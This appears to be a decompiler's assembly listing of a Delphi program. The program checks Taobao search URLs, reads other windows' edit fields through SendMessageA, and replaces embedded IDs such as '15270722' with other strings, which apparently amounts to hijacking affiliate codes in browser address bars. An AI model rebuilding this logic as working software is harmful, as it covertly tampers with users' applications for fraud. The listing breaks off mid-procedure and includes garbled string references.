004BB162 33C0 xor eax, eax
004BB164 5A pop edx
004BB165 59 pop ecx
004BB166 59 pop ecx
004BB167 648910 mov fs:[eax], edx
****** FINALLY
|
004BB16A 6899B14B00 push $004BB199
004BB16F 8D45B0 lea eax, [ebp-$50]
004BB172 BA04000000 mov edx, $00000004
|
004BB177 E89CA3F4FF call 00405518
004BB17C 8D45D0 lea eax, [ebp-$30]
|
004BB17F E870A3F4FF call 004054F4
004BB184 8D45F0 lea eax, [ebp-$10]
004BB187 BA04000000 mov edx, $00000004
|
004BB18C E887A3F4FF call 00405518
004BB191 C3 ret
|
004BB192 E9459BF4FF jmp 00404CDC
004BB197 EBD6 jmp 004BB16F
****** END
|
004BB199 5F pop edi
004BB19A 5E pop esi
004BB19B 5B pop ebx
004BB19C 8BE5 mov esp, ebp
004BB19E 5D pop ebp
004BB19F C3 ret
*)
end;
procedure Tfrm_SSMoon._PROC_004BB33D(Sender : TObject);
begin
(*
004BB33D 8BEC mov ebp, esp
004BB33F 6A00 push $00
004BB341 6A00 push $00
004BB343 6A00 push $00
004BB345 53 push ebx
004BB346 56 push esi
004BB347 57 push edi
004BB348 8955F8 mov [ebp-$08], edx
004BB34B 8BF0 mov esi, eax
004BB34D 33C0 xor eax, eax
004BB34F 55 push ebp
004BB350 6816B54B00 push $004BB516
***** TRY
|
004BB355 64FF30 push dword ptr fs:[eax]
004BB358 648920 mov fs:[eax], esp
004BB35B 8B45F8 mov eax, [ebp-$08]
|
004BB35E E891A1F4FF call 004054F4
004BB363 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BB368 8B8088030000 mov eax, [eax+$0388]
004BB36E 83782800 cmp dword ptr [eax+$28], +$00
004BB372 0F8480010000 jz 004BB4F8
004BB378 33D2 xor edx, edx
004BB37A 55 push ebp
004BB37B 68E6B44B00 push $004BB4E6
***** TRY
|
004BB380 64FF32 push dword ptr fs:[edx]
004BB383 648922 mov fs:[edx], esp
004BB386 8D55FC lea edx, [ebp-$04]
004BB389 8BC6 mov eax, esi
|
004BB38B E8D8E5F4FF call 00409968
004BB390 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BB395 8B8088030000 mov eax, [eax+$0388]
004BB39B 8B4028 mov eax, [eax+$28]
004BB39E 48 dec eax
004BB39F 740B jz 004BB3AC
004BB3A1 48 dec eax
004BB3A2 7438 jz 004BB3DC
004BB3A4 48 dec eax
004BB3A5 745F jz 004BB406
004BB3A7 E9A6000000 jmp 004BB452
004BB3AC 8B55FC mov edx, [ebp-$04]
* Possible String Reference to: 'search8.taobao.com'
|
004BB3AF B82CB54B00 mov eax, $004BB52C
|
004BB3B4 E817A7F4FF call 00405AD0
004BB3B9 85C0 test eax, eax
004BB3BB 7F18 jnle 004BB3D5
004BB3BD 8B55FC mov edx, [ebp-$04]
* Possible String Reference to: 's8.taobao.com'
|
004BB3C0 B848B54B00 mov eax, $004BB548
|
004BB3C5 E806A7F4FF call 00405AD0
004BB3CA 85C0 test eax, eax
004BB3CC 7F07 jnle 004BB3D5
004BB3CE 33C0 xor eax, eax
004BB3D0 E98A000000 jmp 004BB45F
004BB3D5 B001 mov al, $01
004BB3D7 E983000000 jmp 004BB45F
004BB3DC 8B55FC mov edx, [ebp-$04]
* Possible String Reference to: 'search.taobao.com'
|
004BB3DF B860B54B00 mov eax, $004BB560
|
004BB3E4 E8E7A6F4FF call 00405AD0
004BB3E9 85C0 test eax, eax
004BB3EB 7F15 jnle 004BB402
004BB3ED 8B55FC mov edx, [ebp-$04]
* Possible String Reference to: 's.taobao.com'
|
004BB3F0 B87CB54B00 mov eax, $004BB57C
|
004BB3F5 E8D6A6F4FF call 00405AD0
004BB3FA 85C0 test eax, eax
004BB3FC 7F04 jnle 004BB402
004BB3FE 33C0 xor eax, eax
004BB400 EB5D jmp 004BB45F
004BB402 B001 mov al, $01
004BB404 EB59 jmp 004BB45F
004BB406 8B55FC mov edx, [ebp-$04]
* Possible String Reference to: 'search8.taobao.com'
|
004BB409 B82CB54B00 mov eax, $004BB52C
|
004BB40E E8BDA6F4FF call 00405AD0
004BB413 85C0 test eax, eax
004BB415 7F37 jnle 004BB44E
004BB417 8B55FC mov edx, [ebp-$04]
* Possible String Reference to: 's8.taobao.com'
|
004BB41A B848B54B00 mov eax, $004BB548
|
004BB41F E8ACA6F4FF call 00405AD0
004BB424 85C0 test eax, eax
004BB426 7F26 jnle 004BB44E
004BB428 8B55FC mov edx, [ebp-$04]
* Possible String Reference to: 'search.taobao.com'
|
004BB42B B860B54B00 mov eax, $004BB560
|
004BB430 E89BA6F4FF call 00405AD0
004BB435 85C0 test eax, eax
004BB437 7F15 jnle 004BB44E
004BB439 8B55FC mov edx, [ebp-$04]
* Possible String Reference to: 's.taobao.com'
|
004BB43C B87CB54B00 mov eax, $004BB57C
|
004BB441 E88AA6F4FF call 00405AD0
004BB446 85C0 test eax, eax
004BB448 7F04 jnle 004BB44E
004BB44A 33C0 xor eax, eax
004BB44C EB11 jmp 004BB45F
004BB44E B001 mov al, $01
004BB450 EB0D jmp 004BB45F
004BB452 33C0 xor eax, eax
004BB454 5A pop edx
004BB455 59 pop ecx
004BB456 59 pop ecx
004BB457 648910 mov fs:[eax], edx
004BB45A E999000000 jmp 004BB4F8
004BB45F 84C0 test al, al
004BB461 7479 jz 004BB4DC
004BB463 8BD6 mov edx, esi
* Possible String Reference to: 'q='
|
004BB465 B894B54B00 mov eax, $004BB594
|
004BB46A E861A6F4FF call 00405AD0
004BB46F 8BD8 mov ebx, eax
004BB471 85DB test ebx, ebx
004BB473 7F0A jnle 004BB47F
004BB475 33C0 xor eax, eax
004BB477 5A pop edx
004BB478 59 pop ecx
004BB479 59 pop ecx
004BB47A 648910 mov fs:[eax], edx
004BB47D EB79 jmp 004BB4F8
004BB47F 8BFE mov edi, esi
004BB481 85FF test edi, edi
004BB483 7405 jz 004BB48A
004BB485 83EF04 sub edi, +$04
004BB488 8B3F mov edi, [edi]
004BB48A 8D45FC lea eax, [ebp-$04]
004BB48D 50 push eax
004BB48E 8BCF mov ecx, edi
004BB490 2BCB sub ecx, ebx
004BB492 49 dec ecx
004BB493 8D5302 lea edx, [ebx+$02]
004BB496 8BC6 mov eax, esi
|
004BB498 E84FA5F4FF call 004059EC
004BB49D 8B55FC mov edx, [ebp-$04]
004BB4A0 B8A0B54B00 mov eax, $004BB5A0
|
004BB4A5 E826A6F4FF call 00405AD0
004BB4AA 8BD8 mov ebx, eax
004BB4AC 85DB test ebx, ebx
004BB4AE 7F0D jnle 004BB4BD
004BB4B0 8B55F8 mov edx, [ebp-$08]
004BB4B3 8B45FC mov eax, [ebp-$04]
|
004BB4B6 E84D71FFFF call 004B2608
004BB4BB EB1F jmp 004BB4DC
004BB4BD 8D45F4 lea eax, [ebp-$0C]
004BB4C0 50 push eax
004BB4C1 8BCB mov ecx, ebx
004BB4C3 49 dec ecx
004BB4C4 BA01000000 mov edx, $00000001
004BB4C9 8B45FC mov eax, [ebp-$04]
|
004BB4CC E81BA5F4FF call 004059EC
004BB4D1 8B45F4 mov eax, [ebp-$0C]
004BB4D4 8B55F8 mov edx, [ebp-$08]
|
004BB4D7 E82C71FFFF call 004B2608
004BB4DC 33C0 xor eax, eax
004BB4DE 5A pop edx
004BB4DF 59 pop ecx
004BB4E0 59 pop ecx
004BB4E1 648910 mov fs:[eax], edx
004BB4E4 EB12 jmp 004BB4F8
|
004BB4E6 E93D95F4FF jmp 00404A28
004BB4EB 8B45F8 mov eax, [ebp-$08]
|
004BB4EE E801A0F4FF call 004054F4
|
004BB4F3 E84099F4FF call 00404E38
****** END
|
004BB4F8 33C0 xor eax, eax
004BB4FA 5A pop edx
004BB4FB 59 pop ecx
004BB4FC 59 pop ecx
004BB4FD 648910 mov fs:[eax], edx
****** FINALLY
|
004BB500 681DB54B00 push $004BB51D
004BB505 8D45F4 lea eax, [ebp-$0C]
|
004BB508 E8E79FF4FF call 004054F4
004BB50D 8D45FC lea eax, [ebp-$04]
|
004BB510 E8DF9FF4FF call 004054F4
004BB515 C3 ret
|
004BB516 E9C197F4FF jmp 00404CDC
004BB51B EBE8 jmp 004BB505
****** END
|
004BB51D 5F pop edi
004BB51E 5E pop esi
004BB51F 5B pop ebx
004BB520 8BE5 mov esp, ebp
004BB522 5D pop ebp
004BB523 C3 ret
*)
end;
procedure Tfrm_SSMoon._PROC_004BB5A5(Sender : TObject);
begin
(*
004BB5A5 8BEC mov ebp, esp
004BB5A7 B905000000 mov ecx, $00000005
004BB5AC 6A00 push $00
004BB5AE 6A00 push $00
004BB5B0 49 dec ecx
004BB5B1 75F9 jnz 004BB5AC
004BB5B3 53 push ebx
004BB5B4 56 push esi
004BB5B5 57 push edi
004BB5B6 8BF0 mov esi, eax
004BB5B8 33C0 xor eax, eax
004BB5BA 55 push ebp
* Possible String Reference to: '殓旚胫嬅_^[嬪]肬嬱伳佝SVW3缐呚?
| 墔荥墔帼墔濑墔棹墔忐塃鼔
| E鴫E?繳h捈K'
|
004BB5BB 68F0B74B00 push $004BB7F0
***** TRY
|
004BB5C0 64FF30 push dword ptr fs:[eax]
004BB5C3 648920 mov fs:[eax], esp
004BB5C6 33DB xor ebx, ebx
004BB5C8 8BC6 mov eax, esi
004BB5CA 33D2 xor edx, edx
004BB5CC 52 push edx
004BB5CD 50 push eax
004BB5CE 8D45F0 lea eax, [ebp-$10]
|
004BB5D1 E822EDF4FF call 0040A2F8
004BB5D6 8B55F0 mov edx, [ebp-$10]
004BB5D9 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BB5DE 8B808C030000 mov eax, [eax+$038C]
004BB5E4 8B08 mov ecx, [eax]
004BB5E6 FF5154 call dword ptr [ecx+$54]
004BB5E9 40 inc eax
004BB5EA 0F85D0010000 jnz 004BB7C0
004BB5F0 BA5CDD4C00 mov edx, $004CDD5C
004BB5F5 8BC6 mov eax, esi
|
004BB5F7 E8A8F1FFFF call 004BA7A4
004BB5FC 85C0 test eax, eax
004BB5FE 0F85BC010000 jnz 004BB7C0
004BB604 833D5CDD4C0000 cmp dword ptr [$004CDD5C], +$00
004BB60B 0F84AF010000 jz 004BB7C0
004BB611 33D2 xor edx, edx
004BB613 55 push ebp
004BB614 68B4B74B00 push $004BB7B4
***** TRY
|
004BB619 64FF32 push dword ptr fs:[edx]
004BB61C 648922 mov fs:[edx], esp
004BB61F A154DD4C00 mov eax, dword ptr [$004CDD54]
004BB624 83B88803000000 cmp dword ptr [eax+$0388], +$00
004BB62B 750F jnz 004BB63C
004BB62D B301 mov bl, $01
004BB62F 33C0 xor eax, eax
004BB631 5A pop edx
004BB632 59 pop ecx
004BB633 59 pop ecx
004BB634 648910 mov fs:[eax], edx
004BB637 E984010000 jmp 004BB7C0
004BB63C 8D45EC lea eax, [ebp-$14]
|
004BB63F E8B8A6F4FF call 00405CFC
004BB644 50 push eax
004BB645 A15CDD4C00 mov eax, dword ptr [$004CDD5C]
004BB64A 50 push eax
004BB64B 8B00 mov eax, [eax]
004BB64D FF5078 call dword ptr [eax+$78]
|
004BB650 E8F7BCF4FF call 0040734C
004BB655 8B55EC mov edx, [ebp-$14]
004BB658 8D45FC lea eax, [ebp-$04]
|
004BB65B E81CA1F4FF call 0040577C
004BB660 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BB665 8B8088030000 mov eax, [eax+$0388]
004BB66B 8B4020 mov eax, [eax+$20]
004BB66E 8B10 mov edx, [eax]
004BB670 FF5214 call dword ptr [edx+$14]
004BB673 85C0 test eax, eax
004BB675 7E71 jle 004BB6E8
004BB677 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BB67C 8B8088030000 mov eax, [eax+$0388]
004BB682 83782800 cmp dword ptr [eax+$28], +$00
004BB686 7460 jz 004BB6E8
004BB688 803D79DD4C0000 cmp byte ptr [$004CDD79], $00
004BB68F 7457 jz 004BB6E8
004BB691 8D55E8 lea edx, [ebp-$18]
004BB694 8B45FC mov eax, [ebp-$04]
|
004BB697 E8A0FCFFFF call 004BB33C
004BB69C 8B55E8 mov edx, [ebp-$18]
004BB69F A178674C00 mov eax, dword ptr [$004C6778]
|
004BB6A4 E89F9EF4FF call 00405548
004BB6A9 A178674C00 mov eax, dword ptr [$004C6778]
004BB6AE 833800 cmp dword ptr [eax], +$00
004BB6B1 7435 jz 004BB6E8
004BB6B3 B301 mov bl, $01
004BB6B5 8BC6 mov eax, esi
004BB6B7 33D2 xor edx, edx
004BB6B9 52 push edx
004BB6BA 50 push eax
004BB6BB 8D45E4 lea eax, [ebp-$1C]
|
004BB6BE E835ECF4FF call 0040A2F8
004BB6C3 8B55E4 mov edx, [ebp-$1C]
004BB6C6 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BB6CB 8B808C030000 mov eax, [eax+$038C]
004BB6D1 8B08 mov ecx, [eax]
004BB6D3 FF5138 call dword ptr [ecx+$38]
|
004BB6D6 E8B9F3FFFF call 004BAA94
004BB6DB 33C0 xor eax, eax
004BB6DD 5A pop edx
004BB6DE 59 pop ecx
004BB6DF 59 pop ecx
004BB6E0 648910 mov fs:[eax], edx
004BB6E3 E9D8000000 jmp 004BB7C0
004BB6E8 8D4DF8 lea ecx, [ebp-$08]
004BB6EB A154DD4C00 mov eax, dword ptr [$004CDD54]
004BB6F0 8B8088030000 mov eax, [eax+$0388]
004BB6F6 8B55FC mov edx, [ebp-$04]
|
004BB6F9 E8D207FFFF call 004ABED0
004BB6FE 40 inc eax
004BB6FF 742F jz 004BB730
004BB701 8B45F8 mov eax, [ebp-$08]
|
004BB704 E857F2FFFF call 004BA960
004BB709 8BD8 mov ebx, eax
004BB70B 84DB test bl, bl
004BB70D 7421 jz 004BB730
004BB70F 8BC6 mov eax, esi
004BB711 33D2 xor edx, edx
004BB713 52 push edx
004BB714 50 push eax
004BB715 8D45E0 lea eax, [ebp-$20]
|
004BB718 E8DBEBF4FF call 0040A2F8
004BB71D 8B55E0 mov edx, [ebp-$20]
004BB720 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BB725 8B808C030000 mov eax, [eax+$038C]
004BB72B 8B08 mov ecx, [eax]
004BB72D FF5138 call dword ptr [ecx+$38]
004BB730 8D4DF4 lea ecx, [ebp-$0C]
004BB733 8BD6 mov edx, esi
004BB735 8B45FC mov eax, [ebp-$04]
|
004BB738 E813F6FFFF call 004BAD50
004BB73D 837DF400 cmp dword ptr [ebp-$0C], +$00
004BB741 7467 jz 004BB7AA
004BB743 8BC6 mov eax, esi
004BB745 33D2 xor edx, edx
004BB747 52 push edx
004BB748 50 push eax
004BB749 8D45DC lea eax, [ebp-$24]
|
004BB74C E8A7EBF4FF call 0040A2F8
004BB751 8B55DC mov edx, [ebp-$24]
004BB754 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BB759 8B8090030000 mov eax, [eax+$0390]
004BB75F 8B08 mov ecx, [eax]
004BB761 FF5154 call dword ptr [ecx+$54]
004BB764 40 inc eax
004BB765 740A jz 004BB771
004BB767 33C0 xor eax, eax
004BB769 5A pop edx
004BB76A 59 pop ecx
004BB76B 59 pop ecx
004BB76C 648910 mov fs:[eax], edx
004BB76F EB4F jmp 004BB7C0
004BB771 8B45F4 mov eax, [ebp-$0C]
|
004BB774 E8E7F1FFFF call 004BA960
004BB779 8BD8 mov ebx, eax
004BB77B 84DB test bl, bl
004BB77D 7421 jz 004BB7A0
004BB77F 8BC6 mov eax, esi
004BB781 33D2 xor edx, edx
004BB783 52 push edx
004BB784 50 push eax
004BB785 8D45D8 lea eax, [ebp-$28]
|
004BB788 E86BEBF4FF call 0040A2F8
004BB78D 8B55D8 mov edx, [ebp-$28]
004BB790 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BB795 8B808C030000 mov eax, [eax+$038C]
004BB79B 8B08 mov ecx, [eax]
004BB79D FF5138 call dword ptr [ecx+$38]
004BB7A0 33C0 xor eax, eax
004BB7A2 5A pop edx
004BB7A3 59 pop ecx
004BB7A4 59 pop ecx
004BB7A5 648910 mov fs:[eax], edx
004BB7A8 EB16 jmp 004BB7C0
004BB7AA 33C0 xor eax, eax
004BB7AC 5A pop edx
004BB7AD 59 pop ecx
004BB7AE 59 pop ecx
004BB7AF 648910 mov fs:[eax], edx
004BB7B2 EB0C jmp 004BB7C0
|
004BB7B4 E96F92F4FF jmp 00404A28
004BB7B9 33DB xor ebx, ebx
|
004BB7BB E87896F4FF call 00404E38
****** END
|
004BB7C0 33C0 xor eax, eax
004BB7C2 5A pop edx
004BB7C3 59 pop ecx
004BB7C4 59 pop ecx
004BB7C5 648910 mov fs:[eax], edx
****** FINALLY
|
* Possible String Reference to: '嬅_^[嬪]肬嬱伳佝SVW3缐呚?墔荥
| 墔帼墔濑墔棹墔忐塃鼔E鴫E??
| Uh捈K'
|
004BB7C8 68F7B74B00 push $004BB7F7
004BB7CD 8D45D8 lea eax, [ebp-$28]
004BB7D0 BA05000000 mov edx, $00000005
|
004BB7D5 E83E9DF4FF call 00405518
004BB7DA 8D45EC lea eax, [ebp-$14]
|
004BB7DD E81AA5F4FF call 00405CFC
004BB7E2 8D45F0 lea eax, [ebp-$10]
004BB7E5 BA04000000 mov edx, $00000004
|
004BB7EA E8299DF4FF call 00405518
004BB7EF C3 ret
|
004BB7F0 E9E794F4FF jmp 00404CDC
004BB7F5 EBD6 jmp 004BB7CD
****** END
|
004BB7F7 8BC3 mov eax, ebx
004BB7F9 5F pop edi
004BB7FA 5E pop esi
004BB7FB 5B pop ebx
004BB7FC 8BE5 mov esp, ebp
004BB7FE 5D pop ebp
004BB7FF C3 ret
*)
end;
procedure Tfrm_SSMoon._PROC_004BB800(Sender : TObject);
begin
(*
004BB800 55 push ebp
004BB801 8BEC mov ebp, esp
004BB803 81C4D8FEFFFF add esp, $FFFFFED8
004BB809 53 push ebx
004BB80A 56 push esi
004BB80B 57 push edi
004BB80C 33C0 xor eax, eax
004BB80E 8985D8FEFFFF mov [ebp+$FFFFFED8], eax
004BB814 8985DCFEFFFF mov [ebp+$FFFFFEDC], eax
004BB81A 8985E0FEFFFF mov [ebp+$FFFFFEE0], eax
004BB820 8985E4FEFFFF mov [ebp+$FFFFFEE4], eax
004BB826 8985E8FEFFFF mov [ebp+$FFFFFEE8], eax
004BB82C 8985ECFEFFFF mov [ebp+$FFFFFEEC], eax
004BB832 8945FC mov [ebp-$04], eax
004BB835 8945F8 mov [ebp-$08], eax
004BB838 8945F4 mov [ebp-$0C], eax
004BB83B 33C0 xor eax, eax
004BB83D 55 push ebp
004BB83E 6892BC4B00 push $004BBC92
***** TRY
|
004BB843 64FF30 push dword ptr fs:[eax]
004BB846 648920 mov fs:[eax], esp
004BB849 C745F0FFFFFFFF mov dword ptr [ebp-$10], $FFFFFFFF
004BB850 6800010000 push $00000100
004BB855 8D85F0FEFFFF lea eax, [ebp+$FFFFFEF0]
004BB85B 50 push eax
004BB85C 8B4508 mov eax, [ebp+$08]
004BB85F 50 push eax
* Reference to: user32.GetClassNameA()
|
004BB860 E8A3C9F4FF call 00408208
004BB865 8D45FC lea eax, [ebp-$04]
004BB868 8D95F0FEFFFF lea edx, [ebp+$FFFFFEF0]
004BB86E B900010000 mov ecx, $00000100
|
004BB873 E8EC9EF4FF call 00405764
004BB878 8B45FC mov eax, [ebp-$04]
* Possible String Reference to: 'Edit'
|
004BB87B BAB0BC4B00 mov edx, $004BBCB0
|
004BB880 E897A0F4FF call 0040591C
004BB885 0F85B3030000 jnz 004BBC3E
004BB88B 8D45F8 lea eax, [ebp-$08]
|
004BB88E E8619CF4FF call 004054F4
004BB893 8D85F0FEFFFF lea eax, [ebp+$FFFFFEF0]
004BB899 50 push eax
004BB89A 6800010000 push $00000100
004BB89F 6A0D push $0D
004BB8A1 8B4508 mov eax, [ebp+$08]
004BB8A4 50 push eax
* Reference to: user32.SendMessageA()
|
004BB8A5 E846CCF4FF call 004084F0
004BB8AA 8D45F8 lea eax, [ebp-$08]
004BB8AD 8D95F0FEFFFF lea edx, [ebp+$FFFFFEF0]
004BB8B3 B900010000 mov ecx, $00000100
|
004BB8B8 E8A79EF4FF call 00405764
004BB8BD 837DF800 cmp dword ptr [ebp-$08], +$00
004BB8C1 0F84A0030000 jz 004BBC67
004BB8C7 8B55F8 mov edx, [ebp-$08]
* Possible String Reference to: '15270722'
|
004BB8CA B8C0BC4B00 mov eax, $004BBCC0
|
004BB8CF E8FCA1F4FF call 00405AD0
004BB8D4 85C0 test eax, eax
004BB8D6 0F8F8B030000 jnle 004BBC67
004BB8DC A154DD4C00 mov eax, dword ptr [$004CDD54]
004BB8E1 8B8088030000 mov eax, [eax+$0388]
004BB8E7 8B4018 mov eax, [eax+$18]
004BB8EA 8B10 mov edx, [eax]
004BB8EC FF5214 call dword ptr [edx+$14]
004BB8EF 8BD8 mov ebx, eax
004BB8F1 4B dec ebx
004BB8F2 85DB test ebx, ebx
004BB8F4 0F8C89000000 jl 004BB983
004BB8FA 43 inc ebx
004BB8FB 33F6 xor esi, esi
004BB8FD 8D4DF4 lea ecx, [ebp-$0C]
004BB900 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BB905 8B8088030000 mov eax, [eax+$0388]
004BB90B 8B4018 mov eax, [eax+$18]
004BB90E 8BD6 mov edx, esi
004BB910 8B38 mov edi, [eax]
004BB912 FF570C call dword ptr [edi+$0C]
004BB915 8B55F8 mov edx, [ebp-$08]
004BB918 8B45F4 mov eax, [ebp-$0C]
|
004BB91B E8B0A1F4FF call 00405AD0
004BB920 85C0 test eax, eax
004BB922 7E57 jle 004BB97B
004BB924 0FB605CCBC4B00 movzx eax, byte ptr [$004BBCCC]
004BB92B 50 push eax
004BB92C 8D85ECFEFFFF lea eax, [ebp+$FFFFFEEC]
004BB932 50 push eax
* Possible String Reference to: '15270722'
|
004BB933 B9C0BC4B00 mov ecx, $004BBCC0
004BB938 8B55F4 mov edx, [ebp-$0C]
004BB93B 8B45F8 mov eax, [ebp-$08]
|
004BB93E E86D3FF5FF call 0040F8B0
004BB943 8B95ECFEFFFF mov edx, [ebp+$FFFFFEEC]
004BB949 8D45F8 lea eax, [ebp-$08]
|
004BB94C E83B9CF4FF call 0040558C
004BB951 6A00 push $00
004BB953 6A00 push $00
004BB955 6A07 push $07
004BB957 8B4508 mov eax, [ebp+$08]
004BB95A 50 push eax
* Reference to: user32.SendMessageA()
|
004BB95B E890CBF4FF call 004084F0
004BB960 8B45F8 mov eax, [ebp-$08]
004BB963 50 push eax
004BB964 6A00 push $00
004BB966 6A0C push $0C
004BB968 8B4508 mov eax, [ebp+$08]
004BB96B 50 push eax
* Reference to: user32.SendMessageA()
|
004BB96C E87FCBF4FF call 004084F0
004BB971 33C0 xor eax, eax
004BB973 8945F0 mov [ebp-$10], eax
004BB976 E9EC020000 jmp 004BBC67
004BB97B 46 inc esi
004BB97C 4B dec ebx
004BB97D 0F857AFFFFFF jnz 004BB8FD
004BB983 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BB988 8B8088030000 mov eax, [eax+$0388]
004BB98E 8B4020 mov eax, [eax+$20]
004BB991 8B10 mov edx, [eax]
004BB993 FF5214 call dword ptr [edx+$14]
004BB996 8BD8 mov ebx, eax
004BB998 4B dec ebx
004BB999 85DB test ebx, ebx
004BB99B 0F8C93000000 jl 004BBA34
004BB9A1 43 inc ebx
004BB9A2 33F6 xor esi, esi
004BB9A4 8D4DF4 lea ecx, [ebp-$0C]
004BB9A7 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BB9AC 8B8088030000 mov eax, [eax+$0388]
004BB9B2 8B4020 mov eax, [eax+$20]
004BB9B5 8BD6 mov edx, esi
004BB9B7 8B38 mov edi, [eax]
004BB9B9 FF570C call dword ptr [edi+$0C]
004BB9BC 8B55F8 mov edx, [ebp-$08]
004BB9BF 8B45F4 mov eax, [ebp-$0C]
|
004BB9C2 E809A1F4FF call 00405AD0
004BB9C7 85C0 test eax, eax
004BB9C9 7E61 jle 004BBA2C
004BB9CB 0FB605CCBC4B00 movzx eax, byte ptr [$004BBCCC]
004BB9D2 50 push eax
004BB9D3 8D85E8FEFFFF lea eax, [ebp+$FFFFFEE8]
004BB9D9 50 push eax
* Possible String Reference to: '15270722'
|
004BB9DA B9C0BC4B00 mov ecx, $004BBCC0
004BB9DF 8B55F4 mov edx, [ebp-$0C]
004BB9E2 8B45F8 mov eax, [ebp-$08]
|
004BB9E5 E8C63EF5FF call 0040F8B0
004BB9EA 8B95E8FEFFFF mov edx, [ebp+$FFFFFEE8]
004BB9F0 8D45F8 lea eax, [ebp-$08]
|
004BB9F3 E8949BF4FF call 0040558C
004BB9F8 6A00 push $00
004BB9FA 6A00 push $00
004BB9FC 6A07 push $07
004BB9FE 8B4508 mov eax, [ebp+$08]
004BBA01 50 push eax
* Reference to: user32.SendMessageA()
|
004BBA02 E8E9CAF4FF call 004084F0
004BBA07 8B55F8 mov edx, [ebp-$08]
004BBA0A 8BC2 mov eax, edx
004BBA0C 85C0 test eax, eax
004BBA0E 7405 jz 004BBA15
004BBA10 83E804 sub eax, +$04
004BBA13 8B00 mov eax, [eax]
004BBA15 52 push edx
004BBA16 50 push eax
004BBA17 6A0C push $0C
004BBA19 8B4508 mov eax, [ebp+$08]
004BBA1C 50 push eax
* Reference to: user32.SendMessageA()
|
004BBA1D E8CECAF4FF call 004084F0
004BBA22 33C0 xor eax, eax
004BBA24 8945F0 mov [ebp-$10], eax
004BBA27 E93B020000 jmp 004BBC67
004BBA2C 46 inc esi
004BBA2D 4B dec ebx
004BBA2E 0F8570FFFFFF jnz 004BB9A4
004BBA34 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BBA39 8B8088030000 mov eax, [eax+$0388]
004BBA3F 8B401C mov eax, [eax+$1C]
004BBA42 8B10 mov edx, [eax]
004BBA44 FF5214 call dword ptr [edx+$14]
004BBA47 8BD8 mov ebx, eax
004BBA49 4B dec ebx
004BBA4A 85DB test ebx, ebx
004BBA4C 0F8C93000000 jl 004BBAE5
004BBA52 43 inc ebx
004BBA53 33F6 xor esi, esi
004BBA55 8D4DF4 lea ecx, [ebp-$0C]
004BBA58 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BBA5D 8B8088030000 mov eax, [eax+$0388]
004BBA63 8B401C mov eax, [eax+$1C]
004BBA66 8BD6 mov edx, esi
004BBA68 8B38 mov edi, [eax]
004BBA6A FF570C call dword ptr [edi+$0C]
004BBA6D 8B55F8 mov edx, [ebp-$08]
004BBA70 8B45F4 mov eax, [ebp-$0C]
|
004BBA73 E858A0F4FF call 00405AD0
004BBA78 85C0 test eax, eax
004BBA7A 7E61 jle 004BBADD
004BBA7C 0FB605CCBC4B00 movzx eax, byte ptr [$004BBCCC]
004BBA83 50 push eax
004BBA84 8D85E4FEFFFF lea eax, [ebp+$FFFFFEE4]
004BBA8A 50 push eax
* Possible String Reference to: '15270722'
|
004BBA8B B9C0BC4B00 mov ecx, $004BBCC0
004BBA90 8B55F4 mov edx, [ebp-$0C]
004BBA93 8B45F8 mov eax, [ebp-$08]
|
004BBA96 E8153EF5FF call 0040F8B0
004BBA9B 8B95E4FEFFFF mov edx, [ebp+$FFFFFEE4]
004BBAA1 8D45F8 lea eax, [ebp-$08]
|
004BBAA4 E8E39AF4FF call 0040558C
004BBAA9 6A00 push $00
004BBAAB 6A00 push $00
004BBAAD 6A07 push $07
004BBAAF 8B4508 mov eax, [ebp+$08]
004BBAB2 50 push eax
* Reference to: user32.SendMessageA()
|
004BBAB3 E838CAF4FF call 004084F0
004BBAB8 8B55F8 mov edx, [ebp-$08]
004BBABB 8BC2 mov eax, edx
004BBABD 85C0 test eax, eax
004BBABF 7405 jz 004BBAC6
004BBAC1 83E804 sub eax, +$04
004BBAC4 8B00 mov eax, [eax]
004BBAC6 52 push edx
004BBAC7 50 push eax
004BBAC8 6A0C push $0C
004BBACA 8B4508 mov eax, [ebp+$08]
004BBACD 50 push eax
* Reference to: user32.SendMessageA()
|
004BBACE E81DCAF4FF call 004084F0
004BBAD3 33C0 xor eax, eax
004BBAD5 8945F0 mov [ebp-$10], eax
004BBAD8 E98A010000 jmp 004BBC67
004BBADD 46 inc esi
004BBADE 4B dec ebx
004BBADF 0F8570FFFFFF jnz 004BBA55
004BBAE5 8B55F8 mov edx, [ebp-$08]
* Possible String Reference to: '15063185'
|
004BBAE8 B8D8BC4B00 mov eax, $004BBCD8
|
004BBAED E8DE9FF4FF call 00405AD0
004BBAF2 85C0 test eax, eax
004BBAF4 7E63 jle 004BBB59
004BBAF6 0FB605CCBC4B00 movzx eax, byte ptr [$004BBCCC]
004BBAFD 50 push eax
004BBAFE 8D85E0FEFFFF lea eax, [ebp+$FFFFFEE0]
004BBB04 50 push eax
* Possible String Reference to: '15063185'
|
004BBB05 BAD8BC4B00 mov edx, $004BBCD8
* Possible String Reference to: '15270722'
|
004BBB0A B9C0BC4B00 mov ecx, $004BBCC0
004BBB0F 8B45F8 mov eax, [ebp-$08]
|
004BBB12 E8993DF5FF call 0040F8B0
004BBB17 8B95E0FEFFFF mov edx, [ebp+$FFFFFEE0]
004BBB1D 8D45F8 lea eax, [ebp-$08]
|
004BBB20 E8679AF4FF call 0040558C
004BBB25 6A00 push $00
004BBB27 6A00 push $00
004BBB29 6A07 push $07
004BBB2B 8B4508 mov eax, [ebp+$08]
004BBB2E 50 push eax
* Reference to: user32.SendMessageA()
|
004BBB2F E8BCC9F4FF call 004084F0
004BBB34 8B55F8 mov edx, [ebp-$08]
004BBB37 8BC2 mov eax, edx
004BBB39 85C0 test eax, eax
004BBB3B 7405 jz 004BBB42
004BBB3D 83E804 sub eax, +$04
004BBB40 8B00 mov eax, [eax]
004BBB42 52 push edx
004BBB43 50 push eax
004BBB44 6A0C push $0C
004BBB46 8B4508 mov eax, [ebp+$08]
004BBB49 50 push eax
